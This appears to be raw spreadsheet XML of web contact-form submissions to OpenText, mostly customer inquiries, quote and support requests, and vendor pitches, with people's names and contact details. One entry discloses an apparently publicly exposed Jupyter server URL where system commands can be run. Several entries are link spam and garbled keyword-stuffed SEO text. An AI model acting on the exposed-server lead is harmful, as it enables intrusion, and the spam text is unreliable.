We're preparing a project for a customer to search over OpenText Content Server from SharePoint. The main requirement is this, to have the OpenText CS documents in the results search page of SharePoint. Is there a way to add a OpenText Content Server to the SharePoint search? Should be use a connector or there is a standard way provided by OpenText? In case of using a connector, which ones do you recommend, we only know about SeeUnity._x000D_
_x000D_
There is no need by our side to open the documents inside SharePoint, as linking to it would be enough._x000D_
_x000D_
Do not hesitate to contact me for further details. Thanks in advance._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Arnau</t>
  </si>
  <si>
    <t xml:space="preserve">Přeji dobrý den!_x000D_
Naše společnost COTY se sídlem v USA, New York, využivá vašich služeb v oblasti EDI, zejména v oblasi Severni Ameriky. Chteli bychom naše EDI prostředí unifikovat i v ramci Evropy. Jako prvni část kde by implemenace měla proběhnout je skupina Stredni Evropy (POL, CZE, SVK, HUN, ROU). Dál bude postupně následovat zbytek Evropy._x000D_
Mohu porosit o kontakt na někoho s kým je možně tento projekt připravit a implementovat?_x000D_
Dekuji a preji prijemny den!_x000D_
_x000D_
MAREK FIKSA_x000D_
iWay B2B Manager Europe_x000D_
Coty Česká Republika s.r.o._x000D_
Na Okraji 335/42_x000D_
162 00, Praha 6_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We are facing an issue while trying to view images using brava. It says Communication with brava server error. On clicking the show details&gt;&gt;&gt; it says Office Automation Failed._x000D_
We have two nodes and from node A we are facing this issue while from node B we can see that particular image without any error._x000D_
Please advise in same._x000D_
_x000D_
Thanks,_x000D_
Maheshsingh Chandel</t>
  </si>
  <si>
    <t>hello how do I get the product I ordered the steps will be the program .Order Number	IGS-183416</t>
  </si>
  <si>
    <t xml:space="preserve">Used teleforms previously, need to get pricing for new project urgently._x000D_
</t>
  </si>
  <si>
    <t>Opentext eDocs DM10 license</t>
  </si>
  <si>
    <t>Hello All,_x000D_
I am Kübra from Çözümevi. We have a problem accessing to Knowledge Center "Tickets" area. Additionally, there are some accounts related to Cozumevi. But they have not worked here anymore. They are Sema Cifci and Serkan Bicinciler. We need to delete these accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to sign up for the service; I would like to know the charge this incurs. </t>
  </si>
  <si>
    <t xml:space="preserve">Firstclass client and server pricing </t>
  </si>
  <si>
    <t>uppgrade to Dot Net version</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have many customer (that are using Exceed On Demand) that runs into slowness GUI experience.  Our application GUI was written in Java Swing.  _x000D_
_x000D_
We would like to explore with you the possibilities of getting feedback from your R&amp;D about possible bad practices that we should avoid.  These issues never happen on VNC or NX for example._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tal.</t>
  </si>
  <si>
    <t>[IMP] Security Issue_x000D_
Open IPython notebook server_x000D_
url: https://jupyter.magellanpoc.cloud.opentext.com/tree?#notebooks_x000D_
vulnerability: Hacker can run any system commands via terminal of ipython. _x000D_
fix: close the port to public</t>
  </si>
  <si>
    <t>Привет всем участникам! _x000D_
Нашел Интересные новости на этом сайте:  http://himaan.ru : _x000D_
http://himaan.ru/foto-prikoly-interesnoe/6933-doma-na-derevyah.html [b] Дома на деревьях [/b] _x000D_
[url=http://himaan.ru/foto-prikoly-interesnoe/814-poslednie-slova-velikih-lyudey.html] Последние слова великих людей [/url] _x000D_
http://himaan.ru/foto-prikoly-interesnoe/954-kak-strelyayut-sistemy-zalpovogo-ognya-grad-i-uragan.html _x000D_
http://himaan.ru/foto-prikoly-interesnoe/2584-kofemashiny-dutch-lab.html</t>
  </si>
  <si>
    <t>Inquiry for Opentext ECM Solution</t>
  </si>
  <si>
    <t>Need a training on VIM 7.5 SP6</t>
  </si>
  <si>
    <t>Looking for a job change. having 8+ Years experience in OpenText ECM and currently working  with Telekom Malaysia. I will be available for joining in 2 weeks. Kindly let me know if there is any job opportunity for OpenText ECM Consultant 8+ Yrs role. Thank You.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in learning more about your e signature offering.  Do you have some documentation that can be sent me which specifically deals with this aspect of your solution?_x000D_
Thankks_x000D_
Fiona</t>
  </si>
  <si>
    <t>I've lost track of the due date for the support renewal.  Also, what is the sum that will be due?</t>
  </si>
  <si>
    <t>Representacion en mexico tienen?, hay uno pero no tiene numero de contacto!, quiero actualizar mis herramientas TeamDeveloper 2005</t>
  </si>
  <si>
    <t>We're a services and software company in the ITSM space.  We're looking for a new web portal to use in our solution stack.  Highest-level requirements are (1) web portal for bringing together pages from various applications; (2) single-sign-on; (3) dashboarding capabilities with a mediation layer and strong set of widgets; (4) OEM/white label</t>
  </si>
  <si>
    <t>I need opentext/GSX externally exposed APIs to get retail product information</t>
  </si>
  <si>
    <t>We are investigating possible upgrades for our Actuate installation.  It is an older version (8), but has served its purpose well.  We would like to see what OpenText can offer, and will include it in evaluations of other BI products.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I went through your website and I am sure that you would be interested in acquiring a freshly built list of Salesforce users for 2017 World Wide._x000D_
These lists can be used for email campaigns, cold calling and are ideal for lead generation and marketing initiatives as these are highly accurate and freshly built from scratch   _x000D_
_x000D_
Data fields our List Includes:- Company Name, Web Address, Contact Name, Verified Email, Job Title, Application Type, Complete Mailing Address, Phone Number, FAX Number, SIC Code, and Industry details._x000D_
_x000D_
For us to capture your requirement accurately and provide accurate counts and provide accurate samples kindly fill up the three questions below _x000D_
_x000D_
1. Technology you would be interested in?_x000D_
2. Geography you would like to target?_x000D_
3. Job titles you would like to reach?_x000D_
_x000D_
Looking forward to work with you!_x000D_
_x000D_
Thanks and Regards,_x000D_
Kelly Mezano_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak with a representative to discuss costs of the Hybrid solution. RightFax was suggested by a business partner. </t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
The New School is in the process of making payment for Invoice #: Attached. However, we need an updated W-9 from Opentext to update our record in our new Procurement system. Please send your W-9 as possible so AP can make payment. We have also sent a supplier registration to mnarvaez@opentext.com. Could you please complete the registration as this will prevent delays on future payments? _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>I would like access to the Knowledge Base if my company has such access.</t>
  </si>
  <si>
    <t>Very interesting in learning more about axcelerate-ediscovery-product</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
_x000D_
_x000D_
I am writing on behalf of a Monster Energy NASCAR Cup team -StarCom Racing #00 and  I was just curious to see if your company would be interested in doing anything_x000D_
motorsports related sponsorship for 2018._x000D_
_x000D_
I am currently working for StarCom Racing LLC.  that will debut at Kansas Speedway 2017 and we are looking for partners for our 2018 Season which will consists of 36 races throughout the season.  _x000D_
_x000D_
If there would be any interest in sponsorship with our team; I can get the information for your company.  I am able tell you is that the $$ amount we are seeking is not what you would expect to hear for a Cup level team…you could probably arrange a primary sponsorship package for up to 2-3 races for what a single race would be in the “bigger” teams in the Cup Series.  _x000D_
 _x000D_
I can also tell you that one of their primary sponsors from this past season is returning in 2018 because of how much the team accommodates all their requests at the track.  At the end of the day; it’s about managing expectations…being a new team, we unfortunately will not be a top-10 team this early in the season…but it’s a means of being in NASCAR’s premier series in a cost-effective ways and take advantage of all that entitlements such as hospitality of customers/employees, social media, driver appearances, etc. _x000D_
 _x000D_
If this is something you might consider in the least, I’ll be happy to email our 2018 NASCAR Monster Energy Cup Series Deck and/or have someone contact you directly. _x000D_
_x000D_
 _x000D_
Thank you for your time._x000D_
_x000D_
_x000D_
Donna J. Gall_x000D_
Administrative Assistant/Hospitality Coordinator_x000D_
StarCom Racing, LLC_x000D_
1935 S. Main Street Unit 103_x000D_
Salisbury, NC  28144_x000D_
(847)833-2297_x000D_
dgall@starcomracing.com_x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Question - we are currently running Captiva 7.1 and will be upgrading to 7.6._x000D_
Could you please send me and OS and SQL Min  to Max Specs. (All supported versions) or a link to the location of that document._x000D_
Thank you so much for your time. </t>
  </si>
  <si>
    <t>Evaluating Liquid Office as the BPM for a new project at Mercer.  _x000D_
I have used LiquidOffice in the past with a different firm, trying to learn what has changed, also looking for a pricing model.</t>
  </si>
  <si>
    <t>We are receving mail being returned from P O Box791247 Baltimore MD. Please send me your new address so we can mail checks to you Our A/C # is 086078-001. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Open Text Team,_x000D_
I'm using Open Text Exceed 14 x64 and I'm interested in the "OpenText Secure Shell" - Addon in order to connect to Linux-machines using SSH. Is the Secure-Shell-Addon still available for version #14? If that's the case, I would like to receive an evaluation version for testing purpose._x000D_
Best regards, _x000D_
Patrick Musmann_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Customer looking for a Media Archival Platform digital assets (photos, videos, etc) for long term protection, storage and indexing… can you help finding something? </t>
  </si>
  <si>
    <t>Good afternoon,  we send a check to Easylink  service Corp at  PO Box  791247  Baltimore,  MD,  the check has been returned the invoice # was 7833461710 and our account number is  081236-0001,  can you please let me know what a good remit to address is for this check so our account can stay current._x000D_
_x000D_
thanks_x000D_
Ada</t>
  </si>
  <si>
    <t>I'm looking to see if Java is embedded into Documentum, and, if so, what version are y'all on?</t>
  </si>
  <si>
    <t>Looking for a quote</t>
  </si>
  <si>
    <t>We are a consulting company and got an enquiry for an Installation of the new OpenText v16 Exstream Suite (customer is using StreamServe 4.1.2 and wants to upgrade). Some months ago we were able to find a course which described how to install v16 (because newly we need the otds and content server, which wasnt needed for 5.6.2). Can you send me a link to a corresponding course session? Especially we are interested in how to configure replication between development, test &amp; production environments which are running on different servers. _x000D_
_x000D_
Thanks in advance &amp; best regards,_x000D_
_x000D_
Patrick Michels</t>
  </si>
  <si>
    <t>Приветствую! _x000D_
Нашел Приколы за день на этом сайте: http://agentmdk.ru : _x000D_
http://agentmdk.ru/humor/10002-huligan-poluchil-horoshiy-urok-7-foto.html [b] Хулиган получил хороший урок (7 фото) [/b] _x000D_
[url=http://agentmdk.ru/foto-prikoly-interesnoe/4280-samolety-prezidentov-raznyh-stran.html] Самолёты президентов разных стран [/url] _x000D_
http://agentmdk.ru/foto-prikoly-interesnoe/454-istoriya-gruzinskoy-kepki-aerodroma.html _x000D_
http://agentmdk.ru/art/9476-stroitelstvo-novorossiyskoy-vmb.html</t>
  </si>
  <si>
    <t>Fax broadcasting service required, please do get back to us as soon as possible._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Dan Lafayette_x000D_
Manager Lafayette Painting._x000D_
392 North Ave, Burlington, VT 05401_x000D_
Tel:  (802) 275-0010_x000D_
Fax: (802) 863–5399_x000D_
www.lafayettepaintinginc.com</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know if there is a public road map for your plans with Documentum, points of integration between traditional Documentum and OpenTtext products. If you are interested to have partners in Jordan and Levant._x000D_
</t>
  </si>
  <si>
    <t>Привет! _x000D_
Нашел Прикольные новости на этом сайте:  http://anubi.ru : _x000D_
http://anubi.ru/foto-prikoly-interesnoe/6145-ne-ta-knizhka.html [b] Не та книжка [/b] _x000D_
[url=http://anubi.ru/foto-prikoly-interesnoe/98-20-realnyh-mest-kotorye-vyglyadyat-slovno-vyshli-iz-skazok.html] 20 реальных мест, которые выглядят словно вышли из сказок [/url] _x000D_
http://anubi.ru/foto-prikoly-interesnoe/2292-boroda-kak-elka.html _x000D_
http://anubi.ru/foto-prikoly-interesnoe/3535-20-krutyh-idey-dlya-poryadka-v-dome.html</t>
  </si>
  <si>
    <t>Need to see if we can build colorful bill prints and charts for the billing team.</t>
  </si>
  <si>
    <t>I am interested in the training 3-2105 in Sweden the 29th of jan. Are there more people registered for that training today? If not, how many do you require to run the training?_x000D_
Best regards Susanna</t>
  </si>
  <si>
    <t>Dear support,_x000D_
_x000D_
I've received an email with registration confirmation. When I click the "Confirm Registration" link, it sends me to the OpenText site and tells me my account has been activated (this is an older account btw). However, when I go to Support, it still tells me I have a registration confirmation pending. When I click on the link "Request Confirmation Email" it gives me a new email, but with the same result. Can you help me out? Thanks in advance!_x000D_
Kind regards, Dennis Groenen</t>
  </si>
  <si>
    <t>We're a startup that develops a technology for doing most of the bookkeeper job by a robot. We'd like to integrate your solution for parsing invoices. Who should I talk with?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
We are planning upgrade Documentum Content Server version to 7.3._x000D_
_x000D_
Could you please provide the primary support and extended support date for version 7.3._x000D_
_x000D_
Also please provide us documentum content server installation guide for version 7.3._x000D_
_x000D_
Thanks &amp; regards,_x000D_
Nikhil Parkar_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Allied Academies Ltd Conferences invites all the participants from all over the world to attend “10th World Congress on Dementia and Alzheimer’s Disease” Slated during May 25-26,2018 at New York, USA which includes prompt keynote presentations, special sessions, workshops, symposiums, oral talks, poster presentations and exhibitions. _x000D_
_x000D_
For more details: http://dementia.alliedacademies.com/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dears,_x000D_
We have RightFaxAdmin, and would like to renew the support; but our local reseller - prosoft.com.eg; doesn't respond to our communications._x000D_
Kindly, advise._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to send/receive fax via email. We don't have a fax number yet. Could you please send me a quote? I'm also interested in the encrypted version for Health care industry, could you enclose that as well? Thank you. _x000D_
_x000D_
Best regards, _x000D_
Florian </t>
  </si>
  <si>
    <t>Additional information required for product suitability analysis for major engagement.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je suis lancé dans un projet BI, auquel je doit créer des rapports et des tableaux de bord pour superviser l'activité de l'entreprise._x000D_
A partir du net j'ai découvert que vos solutions OpenText Analytics et IHub servent pour cet objectif._x000D_
Par ce message, je veux savoir les prix des solutions et la périodicité du paiement._x000D_
Merci d'avance.</t>
  </si>
  <si>
    <t>Classic Exceed</t>
  </si>
  <si>
    <t>I am not able to create account in Open Text. Its showing Account Creation Error.</t>
  </si>
  <si>
    <t>Morning,_x000D_
We are implementing NOVA as a core collection system in the Netherlands. For archiving we use OpenText (OTCS) and for document creating StreamServe (CCS) and the AdHoc module. We have some 'problems' to connect NOVA and AdHoc. For NOVA it is not possible to connect 'directly' and we think that we are not the first company that 'face' this_x000D_
challenge and that there is a lot of experience within OpenText. Can you please help us with possible user friendly solution to solve this. _x000D_
The challenge is the get the documentID from Adhoc in NOVA so that a casehandler can open the document in Adhoc from NOVA._x000D_
Can you please respond as soon as possible we need an answer on Wednesday, thx in advance_x000D_
_x000D_
Regards,_x000D_
Henk Broos</t>
  </si>
  <si>
    <t xml:space="preserve">Andrew from OIA (Client Relationship Manager) , on behalf of PTTEP,  we require you to urgently re-enable both our Engineers (Raymond’s and Adrian’s) support logins. Our client PTTEP have been invoiced (and they have paid) Workflow (APA) maintenance though us until June 2018. _x000D_
_x000D_
Our engineers must be able to lodge and work through support cases with OpenText on the customers behalf. _x000D_
_x000D_
They have a number of APA issues some of which need to be escalated to OpenText as they are potential software issues._x000D_
Can you please urgently attend to this,  I've happy to call afterhours given the time difference to discuss._x000D_
Kind Regards_x000D_
Andrew_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need quote for:_x000D_
Description: Opentext eDocs DM10 license_x000D_
Product code: DM10 license_x000D_
Quantity: 1_x000D_
</t>
  </si>
  <si>
    <t>Our business has active maintenance on our license baseline. We are upgrading our workstation fleet to Windows 10 OS. I would like to get the latest media which is compatible with 64 bit. Can you please provide link to download latest media.</t>
  </si>
  <si>
    <t xml:space="preserve">My cafeview not opening , error ocurr . </t>
  </si>
  <si>
    <t xml:space="preserve"> feline urinary tract issues and diet -CatNutrition Yoru browser indicates if you've visited this link About feline urinary tract issues and rheir ... and urinary tract Infection ... (previously dryfood -fed)catthat suffered tremendously when his urethra ...   More results.&lt;br&gt; &lt;i&gt; Spray Painmt Color Families  Gray Spray Paint  Krylon &lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://316edtranlu-sayi.soup.io/]Ways to train a cat[/url] [url=http://0desctisde-ji8d.soup.io/]Kitten supplies[/url]  _x000D_
 1 Sep 2014 ... Join Jackson for the next Google+ Hangout and ask him a question live on air! Click here for more:  For  You Should NOT Toilet Train Your Cat - &lt;/h3&gt;.&lt;br&gt; &lt;h4&gt;caturinecleaner  eBay Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt;  _x000D_
spray to stop cat from peeing on carpet _x000D_
 _x000D_
 BestDogUrineCleaning Poducts - Fidosavvy Your browser indicatez if you've visited this link Thebesstdogurinecleaning products on the market are right here ... Can be used oncarpet , upholstery,petbeds, clothing, ... What are the 10bestdog food choices?   More ersults.&lt;br&gt; &lt;h2&gt;Why does myurinesmell bad? - NetDoctor Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt;  _x000D_
  [url=http://9quicigumga04.soup.io/]Dog entry doors[/url] [url=http://larasub-kuwr.soup.io/]Cat pooping on furniture[/url]  _x000D_
 If your cat has crystals in his urine, he's got crystalluria. There are different typesofcrystals, each with its own cause. Sruvite crystals tend to form because  &lt;h2&gt;Crystals in the Urine in aCts - Symptoms, Causes, Diagnosis ... - Wag!&lt;/h2&gt;.&lt;br&gt; What causesurineto have astrongodor ?  Healthy Kidneys .... Your browser indicates if you've visited this link Not drinking enough water causesurineto have astrongodor . Watch Kenneth Stallma,n MD, with Methodist Specialty and Transplant Hospital, explain ot   More results.&lt;br&gt;  _x000D_
cleaning cat urine from carpet _x000D_
 _x000D_
&lt;h3&gt;Gettingcaturinesmellout of  - Houzz Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt; 10 StrangeCatBeahviors Explained - Vetstr</t>
  </si>
  <si>
    <t>Leslie said she was representing your company and collected over$3,000 from me to set up an account with your company.  She collected our company check in her name and now i can't get a phone call back.  No one has our information.  i trusted her and I know she works for you.  I am going to press criminal charges against her and your company.</t>
  </si>
  <si>
    <t>October 29, 2017_x000D_
Co-op Connection_x000D_
200 University Ave W_x000D_
Waterloo Ontario_x000D_
N2L 3G1_x000D_
 _x000D_
OpenText Corp._x000D_
275 Frank Tompa drie_x000D_
Waterloo Ontario_x000D_
N2L 0A1_x000D_
 _x000D_
Dear OpenText Corp.,_x000D_
We are Co-op Connection, a student-run organization at the University of Waterloo, dedicated to connecting students, who are living in the same cities during their co-op work term. We provide social programming and peer support in order to fully support students._x000D_
Since the establishment of Co-op Connection, we have successfully expanded our chapters from Kitchener-Waterloo to different part of the world. For example, we have chapters in Montreal, Vancouver, San Francisco, Los Angeles, the New York City, and Hong Kong.  We are constantly planning events for our chapters across the globe. It could be stressful and nerve-wracking when working in a foreign place without the support of family and friends, students new to cities have a difficult time adjusting and often feel isolated. We are committed to provide a platform for students to exercise their leadership skills and create social programs that meet their needs. Co-op Connection directs them towards other students in similar positions so they have an opportunity to expand their network, and thereby sustain their mental and social well-being. For example, we had a tour at the Hong Kong Zoological and Botanical Garden, a cruise around he Alcatraz Cruises, and snowshoeing in Vancouver, etc. Through these variety of events and activities we hope to give students an opportunity to explore their city and connect with the local community. The success of our organization is heavily dependent upon the financial and product support of private sponsors and the University of Waterloo. We have been fortunate in past year to have support from our school and Rez-One, but we are in need of a sponsor this year in order to continue providing this service. Enterprises like yours demonstrate the infinite support to students to explore the world and help them</t>
  </si>
  <si>
    <t>purchase edocs dm program</t>
  </si>
  <si>
    <t>Our website was abruptly shut down this weekend when our server was hacked. We need a web site produced ASAP. Thanks for your reply.</t>
  </si>
  <si>
    <t>I was just checking out your site, and was very impressed._x000D_
You guys really do some great work._x000D_
Have you considered adding animated videos or 3D videos to your portofolio?_x000D_
My team, located in Israel, helps businesses like yours by creating 60-90 second videos to explain their business at affordable rates with quality that cannot be beaten.._x000D_
Want to hear more?_x000D_
You can check out our work at explainmybusiness.com._x000D_
We are eager to hear back from you!_x000D_
Greetings from Jerusalem,_x000D_
Justin Frank</t>
  </si>
  <si>
    <t>For many years I used FirstClass as an email system at my school.  It was great - I have since retired and an finding the restrictions of other email systems rather annoying.  Is there a way of having a 'private' FirstClass Account?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, please have a sales rep contact me. We are running an RFP and would like to discuss the intent to include your company in the bid. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Rental Services :    SUN / HP / IBM / DELL (Server, Storage – X86 &amp; UNIX) &amp; CISCO (Routers / Switches / Firewall PIX)._x000D_
AMC &amp; Warranty Services :   We Cater our Supports and Services on Back to Back calls, AMC’s and Care Packs Services for almost all the Products of various Brands mentioned in our profile along with Implementations of Infrastructure Managed Services. _x000D_
IT - Infrastructure Management Services / Facility Management Services :  We provide Certified and Experienced professionals for Help-desk management, Project management and IT infrastructure support._x000D_
Up- gradation &amp; Accessories : The Accessories Options and Upgrades Business Division takes care of supply of accessories and upgrades for Servers, Storages of any brand. Processor, Memory, Power Adapter, Graphics cards, HDD etc._x000D_
NEW Product Sale &amp; Refurbishment Product Sale : NSPL works with leaders in Enterprise Computing and offers you the complete range of SERVERS, STORAGE &amp; NETWORKING products  from OEM’s - SUN, HP, IBM, DELL &amp; CISCO._x000D_
</t>
  </si>
  <si>
    <t>We would like to obtain price quotation for OpenText Livelink (Content Management System and automated workflows) v9.7.1 and provide information any office location here in Dubai, UNited Arab Emirates._x000D_
_x000D_
Thank you._x000D_
_x000D_
I hope to hear from you soon.</t>
  </si>
  <si>
    <t>[url=http://internetaccessmonitor.ru/uploads/posts/2016-09/1474377415_32-32_system_dlya_dll186.png][img]http://internetaccessmonitor.ru/uploads/posts/2016-09/1474377415_32-32_system_dlya_dll186.png[/img][/url] _x000D_
Всем привет, уже третий день не могу поставить DirectX - пробовал установить DLL тдельно, но не помогает, пишет что у меня 32-х битная система. Что делать?</t>
  </si>
  <si>
    <t>Hello, _x000D_
I would like to offer my services at the Rideau St. location in Ottawa. I am a Registered Massage Therapist and Acupuncturist for almost 20 years now. I have just moved into the area and would like to offer my expertise to the corporate world in the sense that I would set up a station in your offices and provide massage therapy at the convenience your employees. I have experience working in a variety of settings, including wellness clinics, sports and rehabilitation medicine, relaxation and spa massage. Massage therapy has been proven to increase work efficiency, significantly reduce stress levels, and reduce employee sick days. I would love the opportunity to collaborate with your company._x000D_
_x000D_
I look forward to hearing from you, _x000D_
_x000D_
Valentina Platonova_x000D_
BSc, MSc, PhD, RMT</t>
  </si>
  <si>
    <t>Приветствую! _x000D_
Нашел Приколы с Фото на этом сайте:  http://coolrobo.ru : _x000D_
http://coolrobo.ru/foto-prikoly-interesnoe/1436-klinika-dlya-ranenyh-letuchih-myshey-v-avstralii.html [b] Клиника для раненых летучих мышей в Австралии [/b] _x000D_
[url=http://coolrobo.ru/foto-prikoly-interesnoe/717-ogromnyy-alligator.html] Огромный аллигатор [/url] _x000D_
http://coolrobo.ru/foto-prikoly-interesnoe/1663-15-zanimatelnyh-faktov-o-muravyah.html _x000D_
http://coolrobo.ru/foto-prikoly-interesnoe/5089-odinochestvo-v-odinokom-domike.html</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h4&gt;CatPeieng In Kids Room  ThriftyFun Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; How to Care for a DogAfterSpaying. Getting your female dog, or bitch,spayedis socially responsible. Removing her womb means she cannot get a uterine nifection  a Cat ReactsAfterSpaying - Pets&lt;/h2&gt;.&lt;br&gt;  _x000D_
 [url=http://6nibecoa-nabs.soup.io/]Concentrated urine odor[/url] [url=http://80nisburihokk.soup.io/]How to get cat pee out of leather sofa[/url]  _x000D_
 Take a loo at the new K-Y ad, featuring one of the most time honored (if a little unsettling) tricks for lasting longer  10 Best Delay Sprays I've Personally Tried - Rising Master&lt;/u&gt;.&lt;br&gt; Cats Making Biscuits . 2.9K likes. Kneading may have an origin going back to cats ' wild ancestors who had to tread down foliage to make a temporary  _x000D_
how often do cats urinate _x000D_
 _x000D_
 Catt urine is perhaps not youuur perfume of choice. It certainly is, however, pungent and lingering. If your cat has somehow managed to get pee on your clothes, you amy  Cat Urine Smell out of Clothes TheCatSite&lt;/h2&gt;.&lt;br&gt; What NeutralizesUrineOdor?   Hunker Youjr browser indicates if you've visited this link Urineodor can be neutralized with the help of some easy-to-find household products. Items such as hydrogen peroxide adn baknig soda can be helpful in treating the ...  /13416791/what-neutralizes-urine-odor More results.&lt;br&gt;  _x000D_
  [url=http://pamavern0r.soup.io/]Male stamina spray[/url] [url=http://pistrituei4w.soup.io/]Pee pee outside[/url]  _x000D_
 Shop forgraysprayhair color online at Target. Free shipping on purchases over $35 and save 5% every day with your Target  &lt;u&gt;Grays -SrpayPaint-Paint- Tue Home Depot&lt;/u&gt;.&lt;br&gt; How toRemoveCatUrineFromUpholstery. ... Here's how to get thatturineout of yourcouchor chair upholstery. Blot stain immediately with paper towel,s  Dried, Deep Down,UrineOut of aCouchCushion ... Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
blood in urine diagnosis _x000D_
 _x000D_
For all your questions abouctat neutering .  an impor</t>
  </si>
  <si>
    <t xml:space="preserve">Need guidance </t>
  </si>
  <si>
    <t>Hi, We are looking for an ECM solution that we can bundle with our services for our customers. We think OpenText Extended ECM for Sharepoint is a good product and would like to have more information on pricing. Thanks</t>
  </si>
  <si>
    <t>Is there a version of Brava Reader that doesn't time bomb expire? having to uninstall, re-download and re-install every number of months is a PITA. and causing us to look elsewhere for another program, if we cant get a more permanent Brava Reader.</t>
  </si>
  <si>
    <t>Want to download Brave Reader and FreeDWG Viewer software. I fill out the forms correctly but have not received an email with the link. I did this 2 days ago and again just now. Please help while I try to get my company to authorize me to buy the software._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>Demo for enterprise content management solution(s)</t>
  </si>
  <si>
    <t>Приветствую всех! _x000D_
Нашел Приколы за день на этом сайте:  http://agentorange.ru : _x000D_
http://agentorange.ru/art-foto-interesnoe/80-peterburgskie-alye-parusa.html [b] Петербургские Алые Паруса [/b] _x000D_
[url=http://agentorange.ru/art-foto-interesnoe/4247-chudesnoe-preobrazhenie-kotenka.html] Чудесное преображение котенка [/url] _x000D_
http://agentorange.ru/art-foto-interesnoe/3796-samye-dorogie-sportivnye-kluby-mira-2015.html _x000D_
http://agentorange.ru/art-foto-interesnoe/3192-kak-snimalsya-epicheskiy-film-hrabroe-serdce.html</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are beginning our RFP for AP Automation. Please confirm by 11/2/2017 if you would like to participate. Thank you_x000D_
_x000D_
Victor del Rosario_x000D_
Account Payable Manager_x000D_
Omnicell Inc </t>
  </si>
  <si>
    <t>We use an old version of Actuate and recently tried to update the OS on its server. Can you supply us a new "node key file"? Here is the error message that is displayed: "Reminder:_x000D_
                  One or more iServers in your Actuate iServer system are in violation of the node locked Actuate iServer license. After the grace period expires the iServers that violate the node locked Actuate iServerlicense cannot be restarted. Please contact Actuate Licensing (licensing@actuate.com or http://www.actuate.com/licensing), or your representative, and request a new node key file for the iServer nodes that are in violation. Please restart the iServers on the nodes after updating the node key file.'"</t>
  </si>
  <si>
    <t>Could you provide more details on OpenText eDocs - the price, installation process, and required resources? Our department is currently using OpenText and I would like to find a way to use OpenText as a back-end management system for our intranet - SharePoint. Please note that email is preferred than phone. Thank you.</t>
  </si>
  <si>
    <t>Attempting to get link to live demo of TurboX.  Submitted form multiple times but have not received an email with the link.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to access the OpenText Support due to work with Documentum and Brava (former ICG) platforms at Vale SA._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Would you be interested in acquiring list CORE Users?_x000D_
_x000D_
All  these records contain complete business contact information like company name, company website address, contact name, title, email address, phone number, fax number, physical address, number of employees, revenue size. SIC Code and technology used._x000D_
_x000D_
Feel free to let me know your thoughts on the same._x000D_
_x000D_
Thanks and Regards_x000D_
Sonia White_x000D_
</t>
  </si>
  <si>
    <t>We are looking for a ECM solution for our 2000 user agency.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We're looking at developing and testing a connector to OpenText Documentum for our customers. Do you have a trial or eval version? Or do you have a developer program we could join?_x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
__Jason_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to configure Open Text EDC - Ricoh Module. </t>
  </si>
  <si>
    <t>Request for Support Renewal - Brava Server.  Our maintenance expired in September and we need to renew and get a new license key for our QA Brava server.</t>
  </si>
  <si>
    <t xml:space="preserve">To determine if there is a time limit on the free viewer software.  </t>
  </si>
  <si>
    <t>unable to log support call - says I do not have permission but I should have!</t>
  </si>
  <si>
    <t xml:space="preserve"> tSud100DelaySpray For Men - Premature ejaculation Your browser indicates if youve visited this linbk If yuo want to review complunds likeStud100, you can go to Amazon &amp; type " delaycreamfor men" into the search box, and you can then ... More results. How to Clean ChildrensUrinein theCarpet Your browser indicates if youve visited this link Potty training is a challenging time for both parents and children. If your child doesnt make it to the toilet and pees in thecarpetas an accident, More results.  _x000D_
 [url=http://922telami-riri.soup.io/]Cat urine stain and odor removal[/url] [url=http://lebopudono.soup.io/]Leopard cat pet[/url]  _x000D_
 Simulates your cats natural pheromones  to help your pet cope with stress; Just plug into any wall socket; Completely safe and made to comply with British Feliway Behavior Modifier Refill, 48l, 3-Pack Vials - Kmart. How to use vinegar to clean cat pee smell out of a leather ... .  _x000D_
remedies to keep cats awayh _x000D_
 _x000D_
 IndoorCatLitterBox- Your browser indicates if youve visited this link IndoorCatLitterBox- 103 results from brands Merry Products, Crown Products, Trixie, products like New Age Age Pet Ehlb801-04LitterLooLitterBoxAntwhite ... More results. I just wanted to share a few photos of my twobengalkittens. Im hoping to show these two in the future. Aramis (Im still debating on a registered.  _x000D_
